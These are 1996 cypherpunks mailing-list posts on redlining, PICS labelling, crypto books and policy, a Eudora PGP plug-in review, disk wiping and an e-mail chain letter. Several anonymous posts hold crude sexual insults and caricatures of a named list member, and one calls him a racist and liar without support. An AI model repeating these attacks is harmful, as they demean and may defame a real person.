Would it make a lot of sense for me to try this?  I'm the one arguing
that investors probably know what they are doing.

>>My point is not that there is a great opportunity so "somebody
>>somewhere" will solve the racism problem.  My point is that you
>>yourself do not believe there is a great opportunity if it involves
>>money you really care about, i.e. your own.
>
>Actually, my largest investment is in a minority owned business.  Funny
>thing.  My money.  How odd.

Well, good for you.  I mean that sincerely.  Doing well, I trust?

>>You are claiming that there are ZERO investors who will invest in this
>>great opportunity because they are racists.  Contrary to popular
>>belief, most African-Americans are not poor or even gang members.
>
>Where the hell did this come from?  I *never* asserted it.  Red must be
>watching too much TV.

Perhaps I misunderstood.  Didn't you say that you were involved with a
mortgage program for poor people and were unable to find any
investors?

>>If you are claiming that even African-American investors are
>>irrationally racist about lending to poor people, you should be
>>forewarned that I and many other people are going to find that a
>>little hard to believe.
>
>Racism is a dynamic of Power Red.  There are, unfortunately,
>successful Blacks that do not help out the neighborhoods they came
>from.  They do not credit Affirmative Action for its help.  Consider
>me 'forewarned'.

Please explain in greater detail how the dynamic of power works in
this situation.  I am truly interested, but your one line sentence
gives me little to go on.

I was not proposing that successful African-Americans "help out" their
old neighborhoods.  Rather, I was proposing that they would be able to
see the opportunity and exploit it to the benefit of all parties.
"Greed is good."

>>>>Banks have practiced discrimination, and not just against black
>>>>people.  They have been able to get away with it.  How?  Because
>>>>the government has protected the banking guild from competition.
>
>I never mentioned that blacks were the only poor in this country.
>That was one of Red's assumptions.  Much like the ones about poor
>people being lazy, dirty, blah, blah.

Yes, it appears I did make an assumption.  Every redlining discussion
I have seen in the past concerned African-Americans and this caused me
to make a careless statement.  My apologies.

Getting back to the point, you have failed to explain how banks get
away with their discriminatory practices.  I think the markets see
redlining as damage and route around it.  Why do you believe this is
not happening?

(Astute observers will notice that this thread really does concern the
cypherpunk list.  Summary: Cryptoanarchy will loosen or even eliminate
controls on the flow of capital.  This benefits anybody who is
otherwise shut out of the system, including poor people.)

>>>We agree.  But I feel that a legal elimination of redlining would
>>>decrease costs to the industry.
>>
>>Wrong.  Redlining is devilishly difficult to define.
>
>What's so difficult.  God, I hope you arent an attorney.

Let's consider some laws we could make to stop redlining.  "You will
not draw red lines on maps around neighborhoods where you will not
make loans."  In practice, you will not find the maps and it will be
hard to prove the case.  The banks will make a few loans in the areas
they have redlined just to comply with the law.

The next law will be more complicated.  The government has to dictate
how many loans in what amounts are to be made where.  This is known in
other countries as "central planning".  It has a poor track record.

You may counter, "But you said it would be hard to define and then you
said it could be defined."  I believe that this sort of "law"
stretches the meaning of the phrase the "rule of law" because the
government is not constrained in any way.  It dictates the bank's
actions.

In practice, I think the way it works is that a bank has to make loans
to the same area where it received deposits.  It is unclear whether
this benefits poor people who are good credit risks, but it definitely
punishes poor people who want to deposit money because it makes it a
less attractive market in which to offer banking services.  The
consequence is that many poor people keep their cash around the house.
Naturally, this leads to increased theft and greater difficulty in
saving.

The law has the effect of saying "Poor people can only lend their
money to other poor people."  I find it hard to believe that his
benefits the poor or was intended to do so.

>>That hurts a small bank more than any other because they have to
>>figure out how to comply with the law and defend themselves against
>>the regulators instead of just borrowing and lending money.  It
>>raises the costs of banking.  That means it is harder for people to
>>borrow and lend money.  And that, if you care about efficiency, is
>>inefficient.
>
>It costs money *to practice* redlining.  Not to eliminate the
>practice.  If decisions are based on merit alone, where do costs
>increase.  Redlining adds a layer of investigation to a loan
>analysis.  Eliminating it eliminates one.

It's a pretty easy investigation.  I doubt it costs much.  You've
already heard what I have to say about opportunities.

>>>If they never did we would still have slavery and only white,
>>>adult, male, land-owners would vote.  While success is rare, it has
>>>prevailed when the cause is just.
>>
>>I hate to admit it, but you do have a point here.
>
>And yet you assert that the government should not tell you what to do.
>Make up your mind Red.  

Maybe you can help me with some history.  Didn't the government have
something to do with enforcing slavery laws?  Perhaps I missed
something.

Usually, we want the government to tell other people what to do and to
leave ourselves alone.  Since I respect the desire other people have
to make decisions about their lives, I oppose most governmental
interference.

>>However, the way privacy will be permanently eroded is through laws
>>called "The Privacy Protection Act" which have clauses allowing the
>>government to do whatever it wants.  It is disconcerting to have the
>>government dictating what information you may or may not keep on your
>>computer or who you may give it to.
>
>While this is totally of the point of the post, at least we can agree on
>something.

You did not give the appearance of agreeing with me.  For instance:

At 10:50 AM 12/3/1996, Matthew J. Miszewski wrote:
>(snip)
>>(Just for the record, what the hypothetical insurance companies and
>>employers are doing by using data they have obtained should not, in
>>a free society, be illegal in any way. All information contributes
>>to decision-making, about loans, credit, insurance, employment, etc.
>>In a free society, it is up to people to not disclose that which
>>they do not wish remembered.)
>
>While the libertarians on the list have affected my way of looking at
>regulation I, and others, do not subscribe (suscribe ;)) to Tim's
>absolute theory.  Unless, of course, by free society Tim is refering
>to one where corporations hold themselves to a level of "personal"
>responsibility, which in many realms is part of any definition of
>"free".
>
>Take, for example, the practice of redlining.  How are people who live in
>"bad" neighborhoods supposed to not reveal that information.

While you did not state it explicitly, in the context above I
interpreted this to mean that you supported laws which restricted the
use banks make of information they obtain from their clients.

In other words, people are not allowed to tell each other what they
know.  That does not seem like a good idea.

>[Excuse the tone of the post.  Dealing daily with some of the effects of
>racism, one gets sick of the same arguments and assumptions made by most.
>I thought you were interested in differing points of view, but the tone of
>your post suggested otherwise.]

What you discovered was that I strongly disagree with your point of
view.  That does not mean that I am not interested in what you have to
say.

But let's assume the worst: I am terrible person and I am only using
you to disseminate my own political ideas.  You may find that
patiently demonstrating the flaws in my thinking or how my beliefs are
unfounded in reality is more effective at persuading other people.  As
it is, it appears that you are evading the questions I raise.  The
views I hold are not uncommon in the United States.  I have to think
that you would do the world a service by exposing their flaws, if
there are any.

Red Rackham






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Tue, 10 Dec 1996 00:57:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: [URGENT] Forgery detection
Message-ID: <199612100850.AAA10214@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


The only `culture' Timmy May possesses is that cultivated 
from his foreskin scrapings.

      ,,,
 -ooO(o o)Ooo- Timmy May
       v




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 10 Dec 1996 02:29:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Codebreakers on the shelves!
In-Reply-To: <9612100917.AA00662@srzts100.alcatel.ch>
Message-ID: <v03007806aed2ec6f864a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:17 AM +0100 12/10/96, Remo Pini wrote:

>It's available in swiss bookstores for $49. I'm about to get one :)

I took a look at it a few days ago, and am disappointed.

As near as I can tell, from the comments by Kahn and from looking at it,
the new edition is _exactly_ the same as the 1967 edition, with the
exception of one additional chapter. The last chapter covers the Enigma
story in detail.

However, the public key cryptography revolution is covered in about two or
three pages (or at least this is my recollection). Brief mention is made of
Diffie, Hellman, etc., but nothing surprising or new.

So, it seems a better deal is to get one of the many used copies of the
original, for $20 or less, and then read any of the many good articles on
modern cryptography.

I'm hoping the new edition of Bamford is handled better.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robin Whittle" <firstpr@ozemail.com.au>
Date: Mon, 9 Dec 1996 07:42:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: OECD crypto policy draft guidelines
Message-ID: <199612091541.CAA14288@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


There is an ad-hoc group of government representatives (called an
"expert group" actually) working on an OECD set of cryptography policy
guidelines.

They have a big five day meeting coming up starting 12 December in
Paris.

A September draft of their guidelines was leaked and put on a WWW 
site in Austria: 

   http://www.quintessenz.at/Netzteil/OECD/index.html 

as a Word 6 file.

I got it, turned it into HTML and put it on my site with comments.

   http://www.ozemail.com.au/~firstpr

Recently, someone from the OECD crypto secretariat emailed me 
indicating they had read my comments and found them reasonably 
constructive.

I have since added more comments, which I emailed to the secretariate
person.  If anyone has something constructive to convey to them, email
me and I will put you in touch with them.

I understand there will be an article on the debate in the next 
weekly edition of The European newspaper.

The people at Quintessenz apparently have a later draft which they are
scanning and will put up on their site ASAP.

- Robin




. Robin Whittle                                               .
. http://www.ozemail.com.au/~firstpr   firstpr@ozemail.com.au .
. 11 Miller St. Heidelberg Heights 3081 Melbourne Australia   .
. Ph +61-3-9459-2889    Fax +61-3-9458-1736                   .
. Consumer advocacy in telecommunications, especially privacy .
.                                                             .
. First Principles      - Research and expression - music,    .
.                         music industry, telecommunications  .
.                         human factors in technology adoption.
.                                                             .
. Real World Interfaces - Hardware and software, especially   .
.                         for music                           .




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 10 Dec 1996 02:48:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PICS is not censorship
In-Reply-To: <4396.9612100936@misun2.mi.leeds.ac.uk>
Message-ID: <v03007807aed2edd5da77@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:36 AM +0000 12/10/96, jbaber@mi.leeds.ac.uk wrote:
>Tim May <tcmay@mail.got.net> writes:
>> At 3:52 PM -0800 12/8/96, Lucky Green wrote:
>> >Let's put the question if something like PICS will be mandated aside for
>> >the moment. Do you agree that sites that deliberately mislabel their
>> >content, will eventually face legal action? If so, then PICS should not be
>> >considered truly voluntary.
>
>I disagree, mandating labeling is a completely separate thing from
>deliberately
>mislabeling. No one could force me into entering into a contract with them,
>but if I chose to then it would, and very probably should, be enforceable.

If it's only a contract, and forever only a contract, then I am less
worried. But my point is that I fear the purely contractual status will not
last.

(And, as I think it was Lucky Green who pointed out, what is to stop people
who have _not_ entered into any contract with one of the (several?) PICS
agencies from simply claiming a rating? If the PICS folks want to set up a
system for digital signatures, compliance testing, etc., fine...so long as
non-customers don't have to pay for it. Let the Hallelujah Brigade and the
Dervishes subsidize their systems.)


>> If I believe pictures of people having sex should be marked "Suitable for
>> all ages" (or whatever the Official PICS Status Code is) will I be
>> criminally or civilly in danger? If so, then PICS is a ratings system which
>> individuals are likely to be unable to interpret themselves.
>
>What if the PICS classifications were worded so as to describe the factual
>content of a page rather than the writers opinion of its suitability? This,
>if correctly implemented, could remove the problem of interpretation.

Doubful. I contend that any such approach is bound to fail.

Suppose I describe a picture of adults having sex as "A joyful experience,"
or "Children need to look at this!"?

There simply is no "factual" description of a page. Every person will have
their own descriptions. Mandating that words be "true" is the end of free
speech as we know it.

(For starters, religions--all of them--will have to be shut down.)


>> (This takes the element of intent to deliberately defeat PICS out of the
>> equation, and asks if "innocent mislabeling" or "philosophical disagreement
>> alternate labeling" will expose the mislabeller to charges.
>
>Factual classifications should completely remove the problems of innocent
>mislabeling and philosophical disagreement (if you disagree don't label but
>if you use our labels follow our rules). I would never claim to be a lawyer
>but from my naive point of view I would say that putting false labels on a
>page would be misrepresenting it and could possibly constitute fraud?

Fraud? What happened to free speech? The assumption that there even exist
"factual descriptions" (and presumably "false descriptions") is an
incredibly pernicious idea, at least as regards free speech.

If I wish to describe two people having sex as "Two happy persons engaged
in a happy pursuit," this is not "fraud." True, many parents will dislike
it, as will many Mennonites, etc. So?

>Take for example a page labeled with the <Topless> factual tag, that charged
>for access. Surely a user could, at the very least claim that false
>advertising got him to (pay to) view the page if he was searching for Topless
>pictures?

Not even close. On Highway One, near Monterey, California, is a large sign
saying "Topless." Turns out to be for artichokes. There may be "implied
contracts" for nightclubs with "topless" signs, but in other contexts
"topless" may mean various things.


>> What I see with any such enforcement of PICS standards is yet another Full
>> Employment Act for Lawyers, and the Lawyer's Guild will be oh so happy to
>> see PICS essentially made part of the bureacratic morass:
>>
>> "Due to the complexities of the PICS ratings system, and varying community
>> interpretations of the elements of PICS, we advise that no person post
>> anything to the Net with a PICS rating without seeking competent legal
>> advice from a PICS-licensed legal professional."
>
>Unfortunately this may be the case, however I would suspect that this may go
>the other way with people thinking that if they can be sued for mislabeling
>their pages they just will not label them at all.

Of course, the most correct and consistent view is to just leave it for a
market solution: some label, some don't, some label carelessly, some label
anally [no content is implied! :-}), some label deceptively, some label
clearly, and so on.

Again, my concern is not that some bunch of folks initiate a PICS or SICS
or LIKS system, but that it the legal system gets involved...I surmise that
many lawmakers are already talking about this--this came up in connection
with the CDA case, that a labelling system such as PICS could resolve some
of the issues....I hardly expect that a fully voluntary system would meet
the demands of the censors.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lucifer@dhp.com (Anonymous)
Date: Tue, 10 Dec 1996 01:01:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PGP 3 Beta testers needed
Message-ID: <199612100901.EAA21823@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


> Here, Timmy Mayflower descends into total 
> inanity. He should have a cold shower and/or a 
> Turkish coffee.
> 
>        |\    \ \ \ \ \ \ \      __
>        |  \    \ \ \ \ \ \ \   | O~-_ Timmy Mayflower
>        |   >----|-|-|-|-|-|-|--|  __/
>        |  /    / / / / / / /   |__\
>        |/     / / / / / / /
> 

All joking aside, is there any reason I shouldn't trust Tim May
(assuming I don't care about his personal details like sexual
preference, etc.)?

Thanks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Tue, 10 Dec 1996 05:48:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Puzzle Palace 2nd edition (1983) Info
Message-ID: <3.0.1.32.19961209211613.010dc81c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


I remember that there was some confusion as to the second edition of _The
Puzzle Palace_ by Bamford.  (Sorry if this info has been posted before.  I
did not see a resolution to it.  I may have missed it if it was.)

"I found a copy of _The Puzzle Palace_ 2nd edition!", he said crypticly.

In the Penguin Press printing of _The Puzzle Palace_, it notes that there
is the 1982 edition (published by Houghton Mifflin) and one in 1983
(published by Penguin) with a new afterward.  Since the afterward contains
a fair amount of new information (it looks like a number of FOIA requests
came in after going to press), it is probibly the "Second Edition" of which
Schneier speaks...

Hope that clears things up...

(I am going to see if the dealer I got the book from will give me the info
on where he ordered it.  It was in stock, whereever he got it...)


---
|        "Spam is the Devil's toothpaste!" - stuart@teleport.com         |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Tue, 10 Dec 1996 05:48:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: Review of the EPP plug-in 0.2 for Eudora
Message-ID: <3.0.1.32.19961209221426.010dc81c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


[Note: this is CCed to the developer for two reasons.  First, I wanted him
to know of the review.  Second, I have another two bugs at the bottom that
I have not reported.]

I have been putting the Eudora PGP plug-in through its paces.  My findings
have been interesting...

The instalation was quick and painless.  All of the defaults were pulled
from the mail information upon first running the Eudora after installing.

It provides some basic functions for using PGP.  

The functions provided are:

-- Clearsign Message
-- Decrypt Message
-- Encrypt Message
-- Verify Signature
-- Add Key
-- Paste (Insert) Key

These appear under the Edit menu in the plug-ins submenu.  (It would be
nice for these to be in their own seperate menu, but that may be beyond the
scope of the plug-in developers kit.)

I have not seen any glaring errors (GPFs and the like.)  There are some
functional problems I have discovered.  These should be cleaned up in a
future version.  (What do you expect for a 0.2 release?)

These are the problems/bugs I have found so far:

--  If you do not define a default ID in the PGP config.txt, it will take
the last ID generated on the secret key ring.  (This is a common problem.
This is not the only app that has it.)

--  The program does not word wrap before sending the message to get
signed.  This breaks the signature when Eudora word wraps it opon sending
the message.  (Another common problem. I remember a bunch of apps fixing
this one at one time a few months ago...)

--  If you decrypt a message, the mail headers are destroyed.  (I just
discovered this one last night.  It makes replying a bit of a challenge...)

-- The plug-in does not deal with "personalities".  (This is not a bug, but
something that would be *REAL* helpful.  Now if you could get personalities
that connected to nym servers.)

All in all, this is a useful plug-in.  It has a few rough spots, but that
is to be expected.  (This is a 0.2 release.)

Having this functionality in Eudora makes PGP encrypted lists *MUCH* more
usable.  (Cut and paste for each message and/or firing up a seperate e-mail
app to scan for messages becomes more trouble than it is worth in a real
hurry...)

BTW, this is the original information as to where to get the plug-in.  How
much of this is current, i am not certain...  (The mailing list was broken
according to Lucky Green.)

>                             Eudora/PGP Plug-In
>
>Download version 0.20 from the Web:
>   * http://www.prism.gatech.edu/~gt6525c/eppi/epp16_02.zip
>     (for 16-bit version of Eudora 3.0 for Windows 3.1)
>   * http://www.prism.gatech.edu/~gt6525c/eppi/epp32_02.zip
>     (for 32-bit version of Eudora 3.0 for Windows NT/95)
>
>If you don't have Web access, but have FTP access, try the following sites.
>Note that if the version you are trying to get was released today or just
a few days ago, it may not have shown up at the sites below yet, so give it
a few days:
>
>papa.indstate.edu: /pub/winsock-l/mail/epp16_02.zip
>                   /pub/winsock-l/Windows95/mail/epp32_02.zip
>                   /pub/winsock-l/WindowsNT/mail/epp32_02.zip
>
>ftp.winsite.com:   /pub/pc/win3/winsock/epp16_02.zip
>                   /pub/pc/win95/winsock/epp32_02.zip
>
>If you want to be automatically notified of new versions, send e-mail to
gt6525c@prism.gatech.edu with the subject of "eppi news", and the following
message body:
>
>join
>stop
>
>

---
|        "Spam is the Devil's toothpaste!" - stuart@teleport.com         |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Tue, 10 Dec 1996 06:27:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Patriots should use PGP
Message-ID: <199612101423.GAA15046@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain





















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 10 Dec 1996 07:11:41 -0800 (PST)
To: Anonymous <lucifer@dhp.com>
Subject: Re: PGP 3 Beta testers needed
In-Reply-To: <199612100901.EAA21823@dhp.com>
Message-ID: <32AD7D31.6DBD@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:

[snip cartoon]

> All joking aside, is there any reason I shouldn't trust Tim May
> (assuming I don't care about his personal details like sexual
> preference, etc.)?

You would be well advised not to trust *anyone* unless:

1. They have *your* personal interests at heart (not likely here)

   -or-

2. It is necessary for you to trust them for a particular reason,
   and you feel that you can justify the risk (more likely).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 10 Dec 1996 07:22:08 -0800 (PST)
To: Huge Cajones Remailer <nobody@huge.cajones.com>
Subject: Re: Redlining
In-Reply-To: <199612100815.AAA09236@mailmasher.com>
Message-ID: <32AD7FA4.4C47@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Huge Cajones Remailer wrote:
> I seem to have upset you, Matt Miszewski, and I am sorry for that.  It
> appears to me that the problem we have is that we have different ideas
> about what is right and different perceptions of the nature of the world.

[snip]

> I am assuming that you agree that somebody who has earned their money
> honestly should be able to lend it to whomever they please for
> whatever reason they like.  You call this private lending.  (Please
> correct me if I am wrong.)
> I believe that five friends should be able to get together, pool their
> resources, and lend their money to whomever they like.
> I believe that ten, or a hundred, or a thousand people should be able
> to pool their money and lend it to whomever they please for whatever
> reason they like.

The logical implication here is that a thousand people "getting together"
and doing something is no different in principle than one person doing
that something.  Not a valid implication, although the result is not
necessarily false on a per-case basis.

[snip]

> If I put up a sign in my store saying "Irish need not apply", then
> there is a case.  Usually, it is not so clear.
> It is difficult to prove discrimination because merit is so hard to
> determine.  Many factors go into a hiring decision.  In the end, it is
> usually made on the gut level.

Ironically, discrimination, prejudice, bigotry, hate, etc. are often
judged by the public on a "gut level" as well.  It's just a matter of
how to "educate" the public to see these things.

[snip remainder]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 10 Dec 1996 07:33:40 -0800 (PST)
To: Jamie Lawrence <foodie@netcom.com>
Subject: Re: Secure Erase for PCs?
In-Reply-To: <199612100131.RAA19898@netcom.netcom.com>
Message-ID: <32AD80DC.4CAD@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Jamie Lawrence wrote:
> Igor -
> Thanks for sending this. If I end up porting it, I'll send
> you a copy. I just wanted to wipe a client's disk. I'm a
> little surprised that there doesn't seem to be any tools for
> this on the PC. Another area where Mac's seem to be innovative...

It's a hundred times easier to do tools for the IBM PC.  I make
utilities for the PC, and it would take no more than ten or fifteen
minutes to cook this one up.

But nobody answered my question:  Is there a shortcut way to do the
wipe, say, thirty times?  Ordinarily, I'd run the program thirty
times, which would consist of a data write followed by a flush,
which would take 30x amount of time.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 10 Dec 1996 06:43:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: More "arsenic" fan mail from John Gilmore, his friends and lovers
In-Reply-To: <9612100145.AA00126@cow.net>
Message-ID: <0H3PyD88w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Carriage returns added:

>Date: Mon, 9 Dec 96 20:45:12 EST
>Message-Id: <9612100145.AA00126@cow.net>
>From: Bovine Remailer <haystack@cow.net>
>Comments: This message did not originate from the address above.  It was remailed by an anonymous remailing service.  If you have questions or complaints, please direct them to <haystack-admin@holy.cow.net>
>To: cypherpunks@toad.com
>Sender: owner-cypherpunks@toad.com
>Precedence: bulk
>
>Dr.Dimitri Vulis KOTM blathered:
>
>>More fan mail from John Gilmore and his friends:
>
>...
>
>Kook, must you post all the private mail you dislike to the list, while at
>the same time whining and bitching about the crypto-relevance of anyone and
>everyone else. Many folks you critique do post off topic shit from time to
>time, but nowhere near the percentage (much less the volume) that you do. I
>can't killfile your ass from this machine, but I've decided to provide a
>cypherpunks public service to those who can. It will be low-volume. I am
>going to anonymously repost everything you post that is actually
>crypto-relevant. It will be REALLY low volume. Now, quit posting shit about
>"Timmy" anonymously, with your stupid ascii drawings, and start taking your
>medications so you'll behave nice at the get together, where I'll see you
>and try not to vomit.

I'm not sure if I'm going to the get-together.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 10 Dec 1996 06:41:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PGP 3 Beta testers needed
In-Reply-To: <199612100901.EAA21823@dhp.com>
Message-ID: <ew3PyD91w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


lucifer@dhp.com (Anonymous) writes:
> All joking aside, is there any reason I shouldn't trust Tim May
> (assuming I don't care about his personal details like sexual
> preference, etc.)?

Timmy May is a racist (especially hates Jews) and a proven liar.
Perhaps this doesn't bother you.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 10 Dec 1996 06:43:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: A new memetic message
In-Reply-To: <Pine.HPP.3.95.961210082806.19729V-100000@lorenz.gbar.dtu.dk>
Message-ID: <TZ3PyD92w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I've never seen this one before:

>Date: Tue, 10 Dec 1996 08:28:10 +0100 (MET)
>From: Ahsan Yousaf Durrani <c948148@student.dtu.dk>
>To: dlv@bwalk.dm.com
>Subject: *splat* (fwd)
>Message-Id: <Pine.HPP.3.95.961210082806.19729V-100000@lorenz.gbar.dtu.dk>
>Mime-Version: 1.0
>Content-Type: TEXT/PLAIN; charset=US-ASCII
>
>
>
>---------- Forwarded message ----------
>Date: Fri, 6 Dec 1996 14:02:10 +0100 (MET)
>From: Ahsan Yousaf Durrani <c948148@student.dtu.dk>
>To: c948148@student.dtu.dk
>Subject: *splat*
>
>
>
>
> salaaaam, you've been hit!
>
>
>            ****    *     *   ***   *       *
>           *    *   **    *  *   *  *       *
>           *        * *   *  *   *  *       *
>            *       * *   *  *   *  *       *
>             *      *  *  *  *   *  *   *   *
>               *    *  *  *  *   *  *  * *  *
>                 *  *   * *  *   *   * * * *
>           *    *   *   * *  *   *   * * * *
>            ****    *    **   ***     *   *
>
>              ***         *     *       *
>              *  *       * *    *       *
>              *   *     *   *   *       *
>              *   *    *     *  *       *
>              *****    *******  *       *
>              *    *   *     *  *       *
>              *     *  *     *  *       *
>              *    *   *     *  *       *
>              *****    *     *  ******  ******
>
>
>                 Consider yourself hit by a snowball !!
>
>Send this message to as many people as possible, in the first
>              *E-MAIL SNOWBALL FIGHT!*
>
>Send it back or to people already listed above. Send it to your
>parents, siblings, politicians, teachers, bullies or anyone else
>you've wanted to hit with a snowball. have fun. but don't blame me if
>you're hit back !!
>
>Remember: e-mail snowballs don't hurt, don't get you soaked and
>don't melt away. Throw one today  !
>
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thaddeus J. Beier" <thad@hammerhead.com>
Date: Tue, 10 Dec 1996 08:21:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PICS is not censorship
In-Reply-To: <v03007807aed2edd5da77@[207.167.93.63]>
Message-ID: <32AD8E70.41C6@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:

> 
> If it's only a contract, and forever only a contract, then I am less
> worried. But my point is that I fear the purely contractual status will not
> last.

I completely agree, if the labels, and their format, are mandated, then
it is
a bad thing.

> (And, as I think it was Lucky Green who pointed out, what is to stop people
> who have _not_ entered into any contract with one of the (several?) PICS
> agencies from simply claiming a rating? If the PICS folks want to set up a
> system for digital signatures, compliance testing, etc., fine...so long as
> non-customers don't have to pay for it. Let the Hallelujah Brigade and the
> Dervishes subsidize their systems.)

'zactly.  Signatures are pretty easy, and DSS is free.  Compliance
testing
I'm not so sure about.  They should be able to finance the whole project
by
suing label forgers :-)

> 
> Doubful. I contend that any such approach is bound to fail.
> 
> Suppose I describe a picture of adults having sex as "A joyful experience,"
> or "Children need to look at this!"?
> 
> There simply is no "factual" description of a page. Every person will have
> their own descriptions. Mandating that words be "true" is the end of free
> speech as we know it.

You can label it however you want, Tim.  But, most browsers won't
recognize these
ad-hoc labels, and many people will be blocked from your page.  Which is
fine, those people
have chosen to not see pages that aren't labeled in a way that they
understand, and
that is as it should be.
> 
> Fraud? What happened to free speech? The assumption that there even exist
> "factual descriptions" (and presumably "false descriptions") is an
> incredibly pernicious idea, at least as regards free speech.

Again, the only fraud I would recognize would be if you created a label
that used
the trademark of a labeling company.  I completely agree that you should
be allowed
to describe your page in any way you want, or not at all.

> 
> Of course, the most correct and consistent view is to just leave it for a
> market solution: some label, some don't, some label carelessly, some label
> anally [no content is implied! :-}), some label deceptively, some label
> clearly, and so on.

That's a really 
> 
> Again, my concern is not that some bunch of folks initiate a PICS or SICS
> or LIKS system, but that it the legal system gets involved...I surmise that
> many lawmakers are already talking about this--this came up in connection
> with the CDA case, that a labelling system such as PICS could resolve some
> of the issues....I hardly expect that a fully voluntary system would meet
> the demands of the censors.

We'll just have to see about this, won't we.  I'm betting that it will
work.
I think that you'll be able to set up your browser very easily to
restrict it
to only see the 5% of the pages that happen to be rated (these will be,
naturally,
from the big companies like Discover, Microsoft, McDonalds, and so on)
and these companies
will pressure the government to declare the problem solved, as the kids
will be funneled to their sites.

-- Thaddeus Beier                     thad@hammerhead.com
   Visual Effects Supervisor                408) 287-6770
   Hammerhead Productions  http://www.got.net/people/thad




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 10 Dec 1996 06:42:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Secure Erase for PCs?
In-Reply-To: <v03007800aed2a5ca430e@[10.0.2.15]>
Message-ID: <X43PyD93w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Jamie Lawrence <foodie@netcom.com> writes:

> Igor -
>
> Thanks for sending this. If I end up porting it, I'll send
> you a copy. I just wanted to wipe a client's disk. I'm a
> little surprised that there doesn't seem to be any tools for
